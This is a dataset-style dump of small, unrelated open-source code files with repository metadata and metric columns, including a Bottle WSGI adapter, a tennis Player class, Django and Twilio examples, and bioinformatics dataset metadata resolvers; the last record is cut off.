| 32.328358 | 81 | 0.611727 | 328 | 2,166 | 3.957317 | 0.579268 | 0.033898 | 0.043143 | 0.052388 | 0.089368 | 0.089368 | 0.089368 | 0.089368 | 0.089368 | 0.089368 | 0 | 0.150385 | 0.220222 | 2,166 | 66 | 82 | 32.818182 | 0.618117 | 0.122345 | 0 | 0.083333 | 0 | 0.208333 | 0.386725 | 0.307186 | 0 | 0 | 0.005485 | 0 | 0 | 0 | null | null | 0 | 0.020833 | null | null | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4876f3f9c3badf6fae289a4ddee97faae53ffe65 | 821 | py | Python | src/aceinna/devices/upgrade_workers/__init__.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 41 | 2018-07-20T17:30:33.000Z | 2022-02-24T08:17:39.000Z | src/aceinna/devices/upgrade_workers/__init__.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 52 | 2018-06-25T22:15:14.000Z | 2022-03-10T07:30:56.000Z | src/aceinna/devices/upgrade_workers/__init__.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 31 | 2018-12-19T00:10:08.000Z | 2022-03-19T02:14:03.000Z | class UPGRADE_EVENT:
'''
Event type of Device Message Center
'''
FIRST_PACKET = 'first_packet'
BEFORE_WRITE = 'before_write'
AFTER_WRITE = 'after_write'
BEFORE_COMMAND='before_command'
AFTER_COMMAND='after_command'
FINISH = 'finish'
ERROR = 'error'
PROGRESS = 'progress'
class UPGRADE_GROUP:
FIRMWARE = 'firmware'
BEFORE_ALL = 'before_all'
AFTER_ALL = 'after_all'
from .firmware_worker import FirmwareUpgradeWorker
from .ethernet_sdk_9100_worker import SDKUpgradeWorker as EthernetSDK9100UpgradeWorker
from .sdk_8100_worker import SDKUpgradeWorker as SDK8100UpgradeWorker
from .sdk_9100_worker import SDKUpgradeWorker as SDK9100UpgradeWorker
from .jump_application_worker import JumpApplicationWorker
from .jump_bootloader_worker import JumpBootloaderWorker
| 27.366667 | 86 | 0.779537 | 90 | 821 | 6.8 | 0.422222 | 0.117647 | 0.137255 | 0.147059 | 0.120915 | 0.120915 | 0 | 0 | 0 | 0 | 0 | 0.034935 | 0.163216 | 821 | 29 | 87 | 28.310345 | 0.855895 | 0.042631 | 0 | 0 | 0 | 0 | 0.140442 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.315789 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4882079c321173d6479baa95ec2dc470a5ff9a54 | 2,381 | py | Python | authcode/wsgi/bottle.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 11 | 2015-01-14T17:12:46.000Z | 2015-11-04T12:41:19.000Z | authcode/wsgi/bottle.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | null | null | null | authcode/wsgi/bottle.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 1 | 2016-01-12T14:55:15.000Z | 2016-01-12T14:55:15.000Z | # coding=utf-8
from __future__ import absolute_import
from .._compat import to_native
HTTP_FORBIDDEN = 403
def get_site_name(request):
"""Return the domain:port part of the URL without scheme.
Eg: facebook.com, 127.0.0.1:8080, etc.
"""
urlparts = request.urlparts
return ':'.join([urlparts.hostname, str(urlparts.port)])
def get_full_path(request):
"""Return the current relative path including the query string.
Eg: “/foo/bar/?page=1”
"""
path = request.fullpath
query_string = request.environ.get('QUERY_STRING')
if query_string:
path += '?' + to_native(query_string)
return path
def make_full_url(request, url):
"""Get a relative URL and returns the absolute version.
Eg: “/foo/bar?q=is-open” ==> “http://example.com/foo/bar?q=is-open”
"""
urlparts = request.urlparts
return '{scheme}://{site}/{url}'.format(
scheme=urlparts.scheme,
site=get_site_name(request),
url=url.lstrip('/'),
)
def is_post(request):
"""Return ``True`` if the method of the request is ``POST``.
"""
return request.method.upper() == 'POST'
def is_idempotent(request):
"""Return ``True`` if the method of the request is ``GET`` or ``HEAD``.
"""
return request.method.upper() in ('GET', 'HEAD')
def redirect(url):
"""Return an HTTP 303 See Other response for this url, in the
idiom of the framework.
"""
from bottle import redirect
redirect(url)
def raise_forbidden(msg='You are not allowed to access this.'):
"""Return an HTTP 403 Forbidden response (with the passed message), in the
idiom of the framework.
"""
from bottle import abort
abort(HTTP_FORBIDDEN, msg)
def get_from_params(request, key):
"""Try to read a value named ``key`` from the GET parameters.
"""
return request.query.get(key)
def get_from_headers(request, key):
"""Try to read a value named ``key`` from the headers.
"""
return request.headers.get(key)
def get_post_data(request):
"""Return all the POST data from the request.
"""
return request.forms
def make_response(body, mimetype='text/html'):
"""Build a framework specific HTPP response, containing ``body`` and
marked as the type ``mimetype``.
"""
from bottle import response
response.content_type = mimetype
return body or u''
| 25.329787 | 78 | 0.655187 | 331 | 2,381 | 4.613293 | 0.353474 | 0.051081 | 0.031434 | 0.023576 | 0.176817 | 0.15979 | 0.15979 | 0.15979 | 0.15979 | 0.1074 | 0 | 0.011224 | 0.214196 | 2,381 | 93 | 79 | 25.602151 | 0.804917 | 0.376312 | 0 | 0.051282 | 0 | 0 | 0.067636 | 0.016727 | 0 | 0 | 0 | 0 | 0 | 1 | 0.282051 | false | 0 | 0.128205 | 0 | 0.641026 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
48828efd84d51b57359d8aca027021a0363c7b67 | 1,556 | py | Python | .history/classes/Player_20171106221435.py | reecebenson/DADSA-Tennis-PartA | d0763f819b300fcd0ce27041f5bc4ef0519c00bf | [
"MIT"
] | null | null | null | .history/classes/Player_20171106221435.py | reecebenson/DADSA-Tennis-PartA | d0763f819b300fcd0ce27041f5bc4ef0519c00bf | [
"MIT"
] | null | null | null | .history/classes/Player_20171106221435.py | reecebenson/DADSA-Tennis-PartA | d0763f819b300fcd0ce27041f5bc4ef0519c00bf | [
"MIT"
] | null | null | null | # DADSA - Assignment 1
# Reece Benson
class Player():
_id = None
_name = None
_gender = None
_score = None
_points = None
def __init__(self, _name, _gender, _id):
self._id = _id
self._name = _name
self._gender = _gender
self._score = { }
self._points = 0
def __cmp__(self, other):
"""Compare Override"""
if(self._points < other._points):
return -1
elif(self._points > other._points):
return 1
else:
return 0
# Comparison Overrides
def __eq__(self, other):
return not self._points < other._points and not other._points < self._points
def __ne__(self, other):
return self._points < other._points or other._points < self._points
def __gt__(self, other):
return other._points < self._points
def __ge__(self, other):
return not self._points < other._points
def __le__(self, other):
return not other._points < self._points
def get_name(self):
return self._name
def get_gender(self):
return self._gender
def get_score(self, _match):
return self._score[_match]
def set_score(self, _match, _score):
self.score[_match] = _score
return self._score[_match]
def get_points(self):
return self._points
def set_points(self, _points, append = False):
if(append):
self._points += _points
else:
self._points = _points
return self._points | 24.3125 | 84 | 0.591902 | 184 | 1,556 | 4.538043 | 0.217391 | 0.179641 | 0.08982 | 0.125749 | 0.337725 | 0.22515 | 0.093413 | 0.093413 | 0 | 0 | 0 | 0.004704 | 0.316838 | 1,556 | 64 | 85 | 24.3125 | 0.780809 | 0.046272 | 0 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.282609 | false | 0 | 0 | 0.195652 | 0.717391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
6f8fe5db42909ddc1159a020505c6a3c80660a7d | 303 | py | Python | influxdb_metrics/tests/urls.py | dubizzle/django_influxdb_metrics | 72ee29c87a94a918ab5fda2fe8d246b3f17d2596 | [
"MIT"
] | null | null | null | influxdb_metrics/tests/urls.py | dubizzle/django_influxdb_metrics | 72ee29c87a94a918ab5fda2fe8d246b3f17d2596 | [
"MIT"
] | null | null | null | influxdb_metrics/tests/urls.py | dubizzle/django_influxdb_metrics | 72ee29c87a94a918ab5fda2fe8d246b3f17d2596 | [
"MIT"
] | null | null | null | """URLs to run the tests."""
try:
from django.conf.urls import include, url
except ImportError: # Pre-Django 1.4 version
from django.conf.urls.defaults import include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
]
| 21.642857 | 54 | 0.712871 | 43 | 303 | 5.023256 | 0.581395 | 0.138889 | 0.12963 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.161716 | 303 | 13 | 55 | 23.307692 | 0.84252 | 0.151815 | 0 | 0 | 0 | 0 | 0.027888 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6f9b0a10e535659c9b21dd2e5ba10e21720f1a32 | 543 | py | Python | rest/taskrouter/twiml/example2/example/example.6.x.py | azaddeveloper/api-snippets | f88b153cd7186fa70b33733b205886502db0d1f2 | [
"MIT"
] | 2 | 2017-11-23T11:31:20.000Z | 2018-01-22T04:14:02.000Z | rest/taskrouter/twiml/example2/example/example.6.x.py | azaddeveloper/api-snippets | f88b153cd7186fa70b33733b205886502db0d1f2 | [
"MIT"
] | null | null | null | rest/taskrouter/twiml/example2/example/example.6.x.py | azaddeveloper/api-snippets | f88b153cd7186fa70b33733b205886502db0d1f2 | [
"MIT"
] | 1 | 2019-10-02T14:36:36.000Z | 2019-10-02T14:36:36.000Z | # Download the Python helper library from twilio.com/docs/python/install
from flask import Flask
from twilio.twiml.voice_response import VoiceResponse
app = Flask(__name__)
@app.route("/enqueue_call", methods=['GET', 'POST'])
def enqueue_call():
# workflow_sid = 'WW0123456789abcdef0123456789abcdef'
resp = VoiceResponse()
# TODO waiting for https://github.com/twilio/twilio-python/issues/283
# with resp.enqueue(None, workflowSid=workflow_sid) as e:
# e.task('{"account_number":"12345abcdef"}')
return str(resp)
| 28.578947 | 73 | 0.734807 | 68 | 543 | 5.720588 | 0.691176 | 0.051414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059957 | 0.139963 | 543 | 18 | 74 | 30.166667 | 0.773019 | 0.532228 | 0 | 0 | 0 | 0 | 0.080645 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6f9c124aea08624ba255a7ce5cdd7c9e31477112 | 1,802 | py | Python | web-interface/app/application/src/misc/sampling.py | horvathi94/seqmeta | 94f2f04c372181c93a6f68b6efe15b141ef02779 | [
"MIT"
] | null | null | null | web-interface/app/application/src/misc/sampling.py | horvathi94/seqmeta | 94f2f04c372181c93a6f68b6efe15b141ef02779 | [
"MIT"
] | null | null | null | web-interface/app/application/src/misc/sampling.py | horvathi94/seqmeta | 94f2f04c372181c93a6f68b6efe15b141ef02779 | [
"MIT"
] | null | null | null | from application.src.db.interface import DBInterface
class SamplingStrategies(DBInterface):
display_table_name = "view_sampling_strategies";
edit_table_name = "view_sampling_strategies";
submit_table_name = "sampling_strategies";
save_procedure = "upsert_basic_table";
class SpecimenSources(DBInterface):
display_table_name = "view_specimen_sources";
edit_table_name = "view_specimen_sources";
submit_table_name = "specimen_sources";
save_procedure = "upsert_basic_table";
class SampleCaptureStatuses(DBInterface):
display_table_name = "sample_capture_status";
class HostAnatomicalMaterials(DBInterface):
display_table_name = "view_host_anatomical_materials";
edit_table_name = "view_host_anatomical_materials";
submit_table_name = "host_anatomical_materials";
save_procedure = "upsert_basic_table";
class HostBodyProducts(DBInterface):
display_table_name = "view_host_body_products";
edit_table_name = "view_host_body_products";
submit_table_name = "host_body_products";
save_procedure = "upsert_basic_table";
class PurposesOfSampling(DBInterface):
display_table_name = "purposes_of_sampling";
edit_table_name = "view_purposes_of_sampling";
submit_table_name = "purposes_of_sampling";
save_procedure = "upsert_basic_table";
class PurposesOfSequencing(DBInterface):
display_table_name = "purposes_of_sequencing";
edit_table_name = "view_purposes_of_sequencing";
submit_table_name = "purposes_of_sequencing";
save_procedure = "upsert_basic_table";
class CollectionDevices(DBInterface):
display_table_name = "view_collection_devices";
edit_table_name = "view_collection_devices";
submit_table_name = "collection_devices";
save_procedure = "upsert_basic_table";
| 27.30303 | 58 | 0.781909 | 201 | 1,802 | 6.452736 | 0.21393 | 0.15266 | 0.120278 | 0.166538 | 0.657672 | 0.383963 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138735 | 1,802 | 65 | 59 | 27.723077 | 0.835696 | 0 | 0 | 0.184211 | 0 | 0 | 0.344808 | 0.213215 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6f9de8cc9e026d9da1d97f7f0a7b2fd79f1bb7e9 | 51 | py | Python | production/pygsl-0.9.5/gsl_dist/__init__.py | juhnowski/FishingRod | 457e7afb5cab424296dff95e1acf10ebf70d32a9 | [
"MIT"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | production/pygsl-0.9.5/gsl_dist/__init__.py | juhnowski/FishingRod | 457e7afb5cab424296dff95e1acf10ebf70d32a9 | [
"MIT"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/__init__.py | poojavade/Genomics_Docker | 829b5094bba18bbe03ae97daf925fee40a8476e8 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # Just for declaration
__all__ = ["gsl_Extension"]
| 17 | 27 | 0.745098 | 6 | 51 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 51 | 2 | 28 | 25.5 | 0.75 | 0.392157 | 0 | 0 | 0 | 0 | 0.448276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6fa58d7acf51faa233734496c91bdeed5f65344a | 406 | py | Python | bhabana/models/batch_bottle.py | dashayushman/bhabana | 7438505e20be53a4c524324abf9cf8985d0fc684 | [
"Apache-2.0"
] | null | null | null | bhabana/models/batch_bottle.py | dashayushman/bhabana | 7438505e20be53a4c524324abf9cf8985d0fc684 | [
"Apache-2.0"
] | null | null | null | bhabana/models/batch_bottle.py | dashayushman/bhabana | 7438505e20be53a4c524324abf9cf8985d0fc684 | [
"Apache-2.0"
] | null | null | null | import torch.nn as nn
class BatchBottle(nn.Module):
''' Perform the reshape routine before and after an operation '''
def forward(self, input):
if len(input.size()) <= 2:
return super(BatchBottle, self).forward(input)
size = input.size()[1:]
out = super(BatchBottle, self).forward(input.view(-1, size[0]*size[1]))
return out.view(-1, size[0], size[1]) | 33.833333 | 79 | 0.615764 | 57 | 406 | 4.385965 | 0.526316 | 0.108 | 0.16 | 0.216 | 0.376 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0.025559 | 0.229064 | 406 | 12 | 80 | 33.833333 | 0.773163 | 0.140394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6fc14b4a3c15afc0611e8d52a2622ce959ead9b0 | 453 | py | Python | web/service/InstallService.py | hao707822882/Bichon | 54092e69c9316ee592ee392dc85e1f7fd0c47b68 | [
"Apache-2.0"
] | null | null | null | web/service/InstallService.py | hao707822882/Bichon | 54092e69c9316ee592ee392dc85e1f7fd0c47b68 | [
"Apache-2.0"
] | null | null | null | web/service/InstallService.py | hao707822882/Bichon | 54092e69c9316ee592ee392dc85e1f7fd0c47b68 | [
"Apache-2.0"
] | null | null | null | # _*_ coding:utf-8 _*_
from com.common.BaseLoggingObj import BaseLoggingObj
from web.broker.Brokers import Broker
__author__ = 'Administrator'
class InstallService(BaseLoggingObj, object):
def __init__(self):
pass
def installMysql(self, hostKey):
broker = Broker.getBroker(hostKey)
broker.installMysql()
def installNginx(self, hostKey):
broker = Broker.getBroker(hostKey)
broker.installNginx()
| 21.571429 | 52 | 0.701987 | 45 | 453 | 6.8 | 0.533333 | 0.169935 | 0.111111 | 0.150327 | 0.294118 | 0.294118 | 0.294118 | 0 | 0 | 0 | 0 | 0.002786 | 0.207506 | 453 | 20 | 53 | 22.65 | 0.849582 | 0.04415 | 0 | 0.166667 | 0 | 0 | 0.030162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.083333 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
6fc30f4791dc371f47b7fae65e685fb2f5aa40b8 | 499 | py | Python | BWSIFace/BWSIFace/profileClass.py | skyli42/RiceKrispies | fda6df8a1621326836d2969975ff75b2f8f87690 | [
"MIT"
] | null | null | null | BWSIFace/BWSIFace/profileClass.py | skyli42/RiceKrispies | fda6df8a1621326836d2969975ff75b2f8f87690 | [
"MIT"
] | null | null | null | BWSIFace/BWSIFace/profileClass.py | skyli42/RiceKrispies | fda6df8a1621326836d2969975ff75b2f8f87690 | [
"MIT"
] | 1 | 2018-10-01T02:38:42.000Z | 2018-10-01T02:38:42.000Z | import numpy as np
class ProfileClass:
"""
A class that represents a single profile, which consists of the name of the person, and his or her average image
descriptor vector
"""
def __init__(self, name, descr):
self.name = name
self.descr = descr
self.count = 1
def __repr__(self):
return self.name
def addDescr(self, newDescr):
self.count+=1
self.descr = self.descr*(self.count-1)/self.count + newDescr*1/(self.count)
| 31.1875 | 116 | 0.631263 | 69 | 499 | 4.449275 | 0.507246 | 0.14658 | 0.09772 | 0.09772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01105 | 0.274549 | 499 | 16 | 117 | 31.1875 | 0.837017 | 0.260521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.090909 | 0.090909 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6fc7decfc1873fe492ec9cdce4600a9bd05cb1ba | 131 | py | Python | problem024/solution.py | andysnell/project-euler | 43d92e59d247dfc319c6fe4c22ecc7962e2283ca | [
"FTL"
] | null | null | null | problem024/solution.py | andysnell/project-euler | 43d92e59d247dfc319c6fe4c22ecc7962e2283ca | [
"FTL"
] | null | null | null | problem024/solution.py | andysnell/project-euler | 43d92e59d247dfc319c6fe4c22ecc7962e2283ca | [
"FTL"
] | null | null | null | from itertools import permutations
l = [''.join(map(str, i)) for i in list(permutations(range(0, 10)))]
l.sort()
print(l[999999])
| 21.833333 | 68 | 0.687023 | 22 | 131 | 4.090909 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078261 | 0.122137 | 131 | 5 | 69 | 26.2 | 0.704348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6fd3a58e800c040b9020e1a823d3c01eb7bdfaf8 | 218 | py | Python | code/ljtan.py | Stelanie/sandbox-repo | efdbae40506d3df558e45fa8bcf38985a35f0097 | [
"BSD-3-Clause"
] | null | null | null | code/ljtan.py | Stelanie/sandbox-repo | efdbae40506d3df558e45fa8bcf38985a35f0097 | [
"BSD-3-Clause"
] | null | null | null | code/ljtan.py | Stelanie/sandbox-repo | efdbae40506d3df558e45fa8bcf38985a35f0097 | [
"BSD-3-Clause"
] | null | null | null | import requests
endpoint = 'https://swapi.py4e.com/api'
response = requests.get(f"{endpoint}/people/", {'search': 'luke'}).json()
luke_skywalker = response['results'][0]
print(f"\nLuke Skywalker = {luke_skywalker}") | 27.25 | 73 | 0.706422 | 28 | 218 | 5.428571 | 0.714286 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01005 | 0.087156 | 218 | 8 | 74 | 27.25 | 0.753769 | 0 | 0 | 0 | 0 | 0 | 0.438356 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6fead9ed49807c2fe9948732e02edb234752c8a0 | 305 | py | Python | examples/projects/store_demoqa/tests/header/click_go_to_checkout.py | vault-the/golem | 3bd132685b148c0d9c12deeebfc00569d07063e4 | [
"MIT"
] | null | null | null | examples/projects/store_demoqa/tests/header/click_go_to_checkout.py | vault-the/golem | 3bd132685b148c0d9c12deeebfc00569d07063e4 | [
"MIT"
] | null | null | null | examples/projects/store_demoqa/tests/header/click_go_to_checkout.py | vault-the/golem | 3bd132685b148c0d9c12deeebfc00569d07063e4 | [
"MIT"
] | null | null | null |
description = ''
pages = ['header',
'checkout']
def setup(data):
pass
def test(data):
navigate('http://store.demoqa.com/')
click(header.go_to_checkout)
verify_text_in_element(checkout.title, 'Checkout')
capture('Checkout page is displayed')
def teardown(data):
pass
| 16.052632 | 54 | 0.655738 | 37 | 305 | 5.27027 | 0.72973 | 0.082051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203279 | 305 | 18 | 55 | 16.944444 | 0.802469 | 0 | 0 | 0.166667 | 0 | 0 | 0.236842 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.166667 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
6fee61acc0adaedb48d441af4045e94115b31ff9 | 2,454 | py | Python | pbsmrtpipe/dataset_io.py | PacificBiosciences/pbsmrtpipe | 4d532c823d3a46b82c2eb20b9d46e63544c8ba83 | [
"BSD-3-Clause"
] | 26 | 2015-08-06T02:09:51.000Z | 2021-02-26T02:25:01.000Z | pbsmrtpipe/dataset_io.py | mpkocher/pbsmrtpipe | 4d532c823d3a46b82c2eb20b9d46e63544c8ba83 | [
"BSD-3-Clause"
] | 181 | 2015-08-07T18:13:02.000Z | 2021-04-13T16:24:32.000Z | pbsmrtpipe/dataset_io.py | PacificBiosciences/pbsmrtpipe | 4d532c823d3a46b82c2eb20b9d46e63544c8ba83 | [
"BSD-3-Clause"
] | 29 | 2015-08-07T17:29:42.000Z | 2021-09-15T18:22:37.000Z | import logging
from pbcore.io import FastaReader, FastqReader
from pbcommand.validators import fofn_to_files, validate_file
from pbcommand.models import FileTypes
log = logging.getLogger(__name__)
__all__ = ['UnresolvableDatasetMetadataError',
'dispatch_metadata_resolver',
'has_metadata_resolver']
class UnresolvableDatasetMetadataError(ValueError):
pass
class DatasetMetadata(object):
SUPPORTED_ATTRS = ('nrecords', 'total_length')
def __init__(self, nrecords, total_length):
self.nrecords = nrecords
self.total_length = total_length
def __repr__(self):
_d = dict(k=self.__class__.__name__, n=self.nrecords, t=self.total_length)
return "<{k} nrecords:{n} total:{t} >".format(**_d)
REGISTERED_METADATA_RESOLVER = {}
def register_metadata_resolver(*file_type_or_types):
if not isinstance(file_type_or_types, (list, tuple)):
file_type_or_types = [file_type_or_types]
def _wrapper(func):
for file_type in file_type_or_types:
REGISTERED_METADATA_RESOLVER[file_type] = func
def _f(path):
path = validate_file(path)
return _f(path)
return _f
return _wrapper
def dispatch_metadata_resolver(file_type, path):
"""Simple multiple dispatch mechanism"""
to_ds_metadata_func = REGISTERED_METADATA_RESOLVER.get(file_type, None)
if to_ds_metadata_func is None:
raise UnresolvableDatasetMetadataError("Unable to resolve file type {t}".format(t=file_type))
return to_ds_metadata_func(path)
def has_metadata_resolver(file_type):
return file_type in REGISTERED_METADATA_RESOLVER
def _fofn_to_metadata(path):
files = fofn_to_files(path)
return DatasetMetadata(len(files), len(files))
@register_metadata_resolver(FileTypes.FOFN, FileTypes.RGN_FOFN, FileTypes.MOVIE_FOFN)
def f(path):
return _fofn_to_metadata(path)
def _to_fastax_dataset_metadata(fastx_reader_klass, path):
nrecords = 0
total = 0
with fastx_reader_klass(path) as r:
for record in r:
nrecords += 1
total += len(record.sequence)
return DatasetMetadata(nrecords, total)
@register_metadata_resolver(FileTypes.FASTA)
def _to_fasta_resolver(path):
return _to_fastax_dataset_metadata(FastaReader, path)
@register_metadata_resolver(FileTypes.FASTQ)
def _to_fastq_resolver(path):
return _to_fastax_dataset_metadata(FastqReader, path)
| 25.831579 | 101 | 0.732274 | 306 | 2,454 | 5.454248 | 0.29085 | 0.062313 | 0.029958 | 0.044937 | 0.049131 | 0.049131 | 0.049131 | 0 | 0 | 0 | 0 | 0.001499 | 0.184597 | 2,454 | 94 | 102 | 26.106383 | 0.832584 | 0.013855 | 0 | 0 | 0 | 0 | 0.065866 | 0.032726 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0.017544 | 0.070175 | 0.070175 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6ff2758a847f041f5b556e5b551bca2af6b56c0d | 317 | py | Python | exercisio 107.py | bruno194/EXERCICIOS | cf7f00020515731031275a9b8d2696d7bf3bb5dc | [
"MIT"
] | 1 | 2022-02-25T13:28:46.000Z | 2022-02-25T13:28:46.000Z | exercisio 107.py | bruno194/EXERCICIOS | cf7f00020515731031275a9b8d2696d7bf3bb5dc | [
"MIT"
